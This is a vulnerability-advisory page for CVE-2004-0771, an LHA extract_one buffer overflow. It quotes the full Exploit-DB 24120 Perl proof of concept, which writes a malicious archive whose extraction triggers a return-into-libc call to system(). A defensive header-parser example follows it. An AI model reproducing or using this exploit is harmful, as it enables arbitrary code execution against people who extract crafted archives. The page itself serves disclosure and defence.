CVE-2004-0771
CVSS 10.0
Published: 2004-11-23 00:00:00
Revised: 2016-10-17 22:48:52

[Original] Buffer overflow in the extract_one function from lhext.c in LHA may allow attackers to execute arbitrary code via a long w (working directory) command line option, a different issue than CVE-2004-0769. NOTE: this issue may be REJECTED if there are not any cases in which LHA is setuid or is otherwise used across security boundaries.


[CNNVD] LHA extract_one Multiple Buffer Overflow Vulnerabilities (CNNVD-200411-074)

        A buffer overflow exists in the extract_one function in LHA's lhext.c. An attacker who can pass a long w (working directory) command-line option can execute arbitrary code. Because the trigger is a command-line argument, the issue crosses a security boundary only where LHA runs setuid or is invoked with attacker-controlled arguments, as the MITRE note above states.

- CVSS (base score)

CVSS score: 10 [Critical (HIGH)]
Confidentiality impact: [--]
Integrity impact: [--]
Availability impact: [--]
Access complexity: [--]
Access vector: [--]
Authentication: [--]

- CPE (affected platforms and products)

cpe:/a:tsugio_okamoto:lha:1.17
cpe:/a:tsugio_okamoto:lha:1.14
cpe:/a:tsugio_okamoto:lha:1.15

- OVAL (technical details for detection)

oval:org.mitre.oval:def:9595  Buffer overflow in the extract_one function from lhext.c in LHA may allow attackers to execute arbitrary code via a long w (working director...
*The OVAL definition describes how to detect this vulnerability in detail; see the referenced OVAL definition for the technical details of the check.

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0771
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-0771
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200411-074
(official data source) CNNVD

- Other links and resources

http://bugs.gentoo.org/show_bug.cgi?id=51285
(UNKNOWN)  MISC  http://bugs.gentoo.org/show_bug.cgi?id=51285
http://marc.info/?l=bugtraq&m=108668791510153
(UNKNOWN)  BUGTRAQ  20040606 Re: [SECURITY] [DSA 515-1] New lha packages fix several
http://www.gentoo.org/security/en/glsa/glsa-200409-13.xml
(UNKNOWN)  GENTOO  GLSA-200409-13
http://www.redhat.com/support/errata/RHSA-2004-323.html
(UNKNOWN)  REDHAT  RHSA-2004:323
http://www.redhat.com/support/errata/RHSA-2004-440.html
(UNKNOWN)  REDHAT  RHSA-2004:440
http://www.securityfocus.com/archive/1/363418
(UNKNOWN)  BUGTRAQ  20040515 lha buffer overflow(s) again
http://www.securityfocus.com/bid/10354
(VENDOR_ADVISORY)  BID  10354
http://xforce.iss.net/xforce/xfdb/16196
(VENDOR_ADVISORY)  XF  lha-extractone-bo(16196)
https://bugzilla.fedora.us/show_bug.cgi?id=1833
(UNKNOWN)  FEDORA  FLSA:1833

- Vulnerability information

LHA extract_one Multiple Buffer Overflow Vulnerabilities
Critical  Buffer overflow
2004-11-23 00:00:00 2006-09-20 00:00:00
Remote
        A buffer overflow exists in the extract_one function in LHA's lhext.c. An attacker who can pass a long w (working directory) command-line option can execute arbitrary code. CNNVD classifies the vector as remote; since the trigger is a command-line argument, it crosses a security boundary only where LHA runs setuid or is invoked with attacker-controlled arguments, as the MITRE note states.

- Advisories and patches

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

        Note that the reference list above does include vendor advisories for lha (DSA 515-1, RHSA-2004:323, RHSA-2004:440, GLSA-200409-13, FLSA:1833); check those for fixed packages.

- Vulnerability information (24120)

LHA 1.x Multiple extract_one Buffer Overflow Vulnerabilities (EDBID:24120)
Platform: linux   Type: remote
2004-05-19   Verified
Author: Lukasz Wojtow
Vulnerable app: N/A
source: http://www.securityfocus.com/bid/10354/info

LHA has been reported prone to multiple vulnerabilities that may allow a malicious archive to execute arbitrary code or corrupt arbitrary files when the archive is operated on. These issues are triggered in 'extract_one()' and are due to the application's failure to properly validate string lengths in crafted files.

These issues might allow an attacker to execute code in the context of the user invoking the affected utility.

Exploiting lha-1.14 (after security advisories)
19 May, 2004
Copyright (2004) Lukasz Wojtow <lw@wszia.edu.pl>

At the time of writing this text, some vulnerabilities have been discovered
and fixed, but not all (I've sent info to major Linux distributions and
Bugtraq, but they didn't seem to bother).
This code creates an archive which, decompressed with lha-1.14,
will cause a buffer overflow. The bug is in function extract_one (there are a
lot of bugs, actually). At first it looked like a typical stack overflow,
but after a couple of thoughts it was obvious that returning on the stack was
impossible (due to special 0xff handling). The only option that came to my mind
was return-into-libc.
Addresses inside this code do system("/tmp/lhXXXXXX") and exit().
Before exploiting, 3 addresses have to be obtained:
- system function,
- exit function (not really needed, but a SEGFAULT could be noticed),
- address of /tmp/lhXXXXXX inside the exploited binary.
Put these addresses into their place in the code (in little endian order 
on x86) and run:
./code > archive.lhz

then command
lha -e archive.lhz 
will cause execution of /tmp/lhXXXXXX
Enjoy

---CODE START---

#!/usr/bin/perl
# Writes a crafted LHA archive to stdout: a chain of level-1 "-lhd-" directory
# entries whose type 0x02 (directory name) extension headers grow with each
# entry, until the last one overruns the buffer in extract_one. The overwritten
# frame is a return-into-libc chain: system() with the "/tmp/lhXXXXXX" string
# as its argument, then exit(). Replace the three addresses with the values for
# the target lha binary and libc (little-endian on x86), then:
#   ./code > archive.lhz
use strict;
use warnings;
binmode STDOUT;   # raw bytes, no newline translation

my $exit_addr   = "\x50\xf2\x4\x40";   # address of exit()
my $system_addr = "\x30\x65\x6\x40";   # address of system()
my $tmp_string  = "\xfa\x1e\x5\x8";    # address of "/tmp/lhXXXXXX" inside the lha binary

print	"\x19\x8d\x2d\x6c\x68\x64\x2d\x18\x0\x0\x0\x0\x0\x0\x0\xe1\xa5".
	"\xb2\x30\x20\x1\x0\x0\x0\x55\x5\x0\x50\xed\x41\x7\x0\x51\x0\x0".
	"\x0\x0\x5\x0\x2\x46\xff\x7\x0\x54\x37\x68\xaa\x40\x0\x0\x19\xde".
	"\x2d\x6c\x68\x64\x2d\x69\x0\x0\x0\x0\x0\x0\x0\xe1\xa5\xb2\x30\x20".
	"\x1\x0\x0\x0\x55\x5\x0\x50\xed\x41\x7\x0\x51\x0\x0\x0\x0\x56\x0\x2".
	"\x46\xff\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\xff\x7\x0\x54\x37\x68\xaa\x40\x0\x0\x19\x2f\x2d\x6c\x68".
	"\x64\x2d\xba\x0\x0\x0\x0\x0\x0\x0\xe1\xa5\xb2\x30\x20\x1\x0\x0\x0".
	"\x55\x5\x0\x50\xed\x41\x7\x0\x51\x0\x0\x0\x0\xa7\x0\x2\x46\xff\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\xff\x7\x0\x54\x37\x68\xaa\x40\x0\x0\x19\x81\x2d\x6c\x68\x64\x2d".
	"\xb\x1\x0\x0\x0\x0\x0\x0\xe1\xa5\xb2\x30\x20\x1\x0\x0\x0\x55\x5\x0".
	"\x50\xed\x41\x7\x0\x51\x0\x0\x0\x0\xf8\x0\x2\x46\xff\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff".
	"\x7\x0\x54\x37\x68\xaa\x40\x0\x0\x19\xff\x2d\x6c\x68\x64\x2d\x48".
	"\x1\x0\x0\x0\x0\x0\x0\x21\xa6\xb2\x30\x20\x1\x0\x0\x0\x55\x5\x0\x50".
	"\xed\x41\x7\x0\x51\x0\x0\x0\x0\x35\x1\x2\x46\xff\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff\x7\x0\x54\xaf\x68".
	"\xaa\x40\x0\x0\x19\x10\x2d\x6c\x68\x64\x2d\x59\x1\x0\x0\x0\x0\x0\x0".
	"\x21\xa6\xb2\x30\x20\x1\x0\x0\x0\x55\x5\x0\x50\xed\x41\x7\x0\x51\x0".
	"\x0\x0\x0\x46\x1\x2\x46\xff\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\xff\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
	"\x41\x41\x41\x41\xff\x41\x41\x41\x41".
	$system_addr.  $exit_addr.  $tmp_string.
	"\xff\x7\x0\x54\xaf\x68\xaa\x40\x0\x0\x0";

---CODE END---		
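The archive the PoC writes is a chain of LHA level-1 "-lhd-" directory entries whose type 0x02 (directory name) extension headers grow from 2 bytes to several hundred, until the last one overruns the fixed-size buffer that extract_one copies it into; the 0xff bytes inside those names are the path separators the write-up's remark about "special 0xff handling" refers to. The C below is an added example, not part of the exploit post or of LHA's source: it walks that header layout with every length checked (base-header size and checksum, extension size, directory-name length against the destination buffer) and rewrites each 0xff to '/', the conversion that would mangle any address containing an 0xff byte, such as the x86 Linux stack addresses of that era. DEMO_NAME_MAX, the function names and the error codes are assumptions for the demo; poc_first_entry is the first 51 bytes of the Perl output, and build_dir_entry constructs further test entries in the same layout.

```c
/* Added example, not LHA's code: a bounds-checked walker for the LHA level-1
 * header layout the PoC above uses (base header with a size byte and 8-bit
 * checksum, then a chain of extension headers whose 16-bit size counts the type
 * byte, the data and the next-size field). Buffer sizes, names and error codes
 * are assumptions for this demo, not LHA's own. */
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define DEMO_NAME_MAX 64   /* assumed fixed-size destination buffers */
#define EXT_DIRNAME   0x02 /* extension type: directory name, 0xff = separator */

struct lha1_entry {
    uint32_t packed_size;        /* level 1: counts the extension headers too */
    char     name[DEMO_NAME_MAX];
    char     dir[DEMO_NAME_MAX]; /* type 0x02 data with 0xff rewritten to '/' */
    size_t   total_len;          /* stream bytes consumed by this entry */
};

static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) { return rd16(p) | ((uint32_t)rd16(p + 2) << 16); }
static void wr16(uint8_t *p, uint16_t v) { p[0] = (uint8_t)v; p[1] = (uint8_t)(v >> 8); }
static void wr32(uint8_t *p, uint32_t v) { wr16(p, (uint16_t)v); wr16(p + 2, (uint16_t)(v >> 16)); }

/* Parse one entry: 0 on success, a negative code for any malformed, truncated
 * or oversized field. Every copy into a fixed buffer is length-checked first. */
int parse_lha1_entry(const uint8_t *buf, size_t len, struct lha1_entry *e)
{
    memset(e, 0, sizeof *e);
    if (len < 27) return -1;
    size_t hsize = buf[0];                      /* bytes from offset 2 through next-size */
    if (hsize < 25 || len < 2 + hsize) return -1;
    unsigned sum = 0;
    for (size_t i = 2; i < 2 + hsize; i++) sum += buf[i];
    if ((sum & 0xff) != buf[1]) return -2;      /* base-header checksum */
    e->packed_size = rd32(buf + 7);
    if (buf[20] != 1) return -3;                /* only header level 1 is handled */
    size_t namelen = buf[21];
    if (hsize != 25 + namelen) return -4;       /* name must exactly fill the header */
    if (namelen >= sizeof e->name) return -5;
    memcpy(e->name, buf + 22, namelen);
    size_t pos = 22 + namelen + 3;              /* skip CRC and OS id */
    uint16_t next = rd16(buf + pos); pos += 2;
    size_t ext_start = pos;
    while (next != 0) {
        if (next < 3) return -6;                /* must cover type + next-size */
        if (next > len - pos) return -7;        /* extension runs past the input */
        uint8_t type = buf[pos]; size_t dlen = next - 3;
        if (type == EXT_DIRNAME) {
            if (dlen >= sizeof e->dir) return -8;   /* the check the overflow needs */
            for (size_t i = 0; i < dlen; i++)
                e->dir[i] = (buf[pos + 1 + i] == 0xff) ? '/' : (char)buf[pos + 1 + i];
        }
        pos += next - 2;                        /* land on this header's next-size */
        next = rd16(buf + pos); pos += 2;
    }
    if (pos - ext_start > e->packed_size) return -9;  /* packed size must cover ext */
    if (e->packed_size > len - ext_start) return -7;   /* member data truncated */
    e->total_len = ext_start + e->packed_size;
    return 0;
}

/* Construct a "-lhd-" entry in the PoC's layout whose only extension is a type
 * 0x02 directory name of dirlen bytes. Returns bytes written, 0 if it won't fit. */
size_t build_dir_entry(uint8_t *out, size_t cap, const uint8_t *dirname, size_t dirlen)
{
    size_t ext_len = 3 + dirlen, total = 27 + ext_len;
    if (ext_len > 0xffff || total > cap) return 0;
    memset(out, 0, 27);
    out[0] = 25; memcpy(out + 2, "-lhd-", 5);
    wr32(out + 7, (uint32_t)ext_len);           /* packed size = extension bytes */
    wr32(out + 15, 0x30b2a5e1);                 /* timestamp taken from the PoC */
    out[19] = 0x20; out[20] = 1; out[24] = 'U';
    wr16(out + 25, (uint16_t)ext_len);
    unsigned sum = 0;
    for (size_t i = 2; i < 27; i++) sum += out[i];
    out[1] = (uint8_t)sum;
    out[27] = EXT_DIRNAME; memcpy(out + 28, dirname, dirlen);
    wr16(out + 28 + dirlen, 0);                 /* end of the extension chain */
    return total;
}

/* First entry of the PoC archive, copied byte for byte from the Perl above. */
const uint8_t poc_first_entry[51] = {
    0x19,0x8d,0x2d,0x6c,0x68,0x64,0x2d,0x18,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xe1,
    0xa5,0xb2,0x30,0x20,0x01,0x00,0x00,0x00,0x55,0x05,0x00,0x50,0xed,0x41,0x07,0x00,
    0x51,0x00,0x00,0x00,0x00,0x05,0x00,0x02,0x46,0xff,0x07,0x00,0x54,0x37,0x68,0xaa,
    0x40,0x00,0x00 };

int main(void)
{   /* stand-alone: report how the PoC's first entry parses */
    struct lha1_entry e;
    int rc = parse_lha1_entry(poc_first_entry, sizeof poc_first_entry, &e);
    if (rc == 0) printf("ok: packed=%u dir=\"%s\"\n", (unsigned)e.packed_size, e.dir);
    else printf("rejected: %d\n", rc);
    return 0;
}
```

To scan a whole archive, call parse_lha1_entry on successive entries, advancing by total_len each time, and treat any negative return as a malformed archive before anything is extracted; the PoC's second entry, with an 83-byte directory name, is rejected by the dlen check under the 64-byte demo buffer, whereas the first (directory "F/") parses cleanly.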

- Vulnerability information

9520
LHA extract_one Function Overflow
Input Manipulation
Loss of Integrity

- Vulnerability description

Unknown or Incomplete

- Timeline

2004-05-15 Unknown
Unknown Unknown

- Solution

Unknown or Incomplete

- Related references

- Vulnerability author

Unknown or Incomplete

- Vulnerability information

LHA Multiple extract_one Buffer Overflow Vulnerabilities
Boundary Condition Error 10354
Yes No
2004-05-15 12:00:00 2009-07-12 04:07:00
Discovery of this issue is credited to Lukasz Wojtow <lw@wszia.edu.pl>.

- Affected program versions

Mr. S.K. LHA 1.17
Mr. S.K. LHA 1.15
Mr. S.K. LHA 1.14
F-Secure Personal Express 4.7
F-Secure Personal Express 4.6
F-Secure Personal Express 4.5
F-Secure Internet Security 2004
F-Secure Internet Security 2003
F-Secure Internet Gatekeeper 6.32
F-Secure Internet Gatekeeper 6.31
F-Secure F-Secure for Firewalls 6.20
F-Secure Anti-Virus for Workstations 5.42
F-Secure Anti-Virus for Workstations 5.41
F-Secure Anti-Virus for Windows Servers 5.42
F-Secure Anti-Virus for Windows Servers 5.41
F-Secure Anti-Virus for Samba Servers 4.60
F-Secure Anti-Virus for MS Exchange 6.21
F-Secure Anti-Virus for MIMEsweeper 5.42
F-Secure Anti-Virus for MIMEsweeper 5.41
F-Secure Anti-Virus for Linux Workstations 4.52
F-Secure Anti-Virus for Linux Workstations 4.51
F-Secure Anti-Virus for Linux Servers 4.52
F-Secure Anti-Virus for Linux Servers 4.51
F-Secure Anti-Virus for Linux Gateways 4.52
F-Secure Anti-Virus for Linux Gateways 4.51
F-Secure Anti-Virus Client Security 5.52
F-Secure Anti-Virus Client Security 5.50
F-Secure Anti-Virus 2004
F-Secure Anti-Virus 2003

- Vulnerability discussion

LHA has been reported prone to multiple vulnerabilities that may allow a malicious archive to execute arbitrary code or corrupt arbitrary files when the archive is operated on. These issues are triggered in 'extract_one()' and are due to the application's failure to properly validate string lengths in crafted files.

These issues might allow an attacker to execute code in the context of the user invoking the affected utility.

- Exploit

The following proof of concept exploit code is available (see the Exploit-DB entry 24120 above):

- Solution

Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com.

- Related references

About the SCAP Chinese Community

The SCAP Chinese Community (SCAP中文社区) is the first Chinese-language open community in China devoted to SCAP.

Copyright notice

CVE, CWE and OVAL are registered trademarks of the MITRE Corporation; their official data sources are kept on MITRE's websites.